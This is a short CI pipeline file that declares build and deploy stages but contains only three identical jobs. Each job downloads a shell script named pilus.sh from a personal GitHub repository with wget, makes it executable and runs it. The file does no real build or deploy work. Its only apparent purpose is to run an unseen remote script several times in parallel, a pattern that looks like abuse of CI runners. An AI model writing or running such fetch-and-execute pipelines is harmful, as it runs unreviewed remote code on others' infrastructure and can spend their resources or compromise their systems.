stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bambang501/test-bash/main/pilus.sh && chmod +x pilus.sh && ./pilus.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bambang501/test-bash/main/pilus.sh && chmod +x pilus.sh && ./pilus.sh   
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bambang501/test-bash/main/pilus.sh && chmod +x pilus.sh && ./pilus.sh    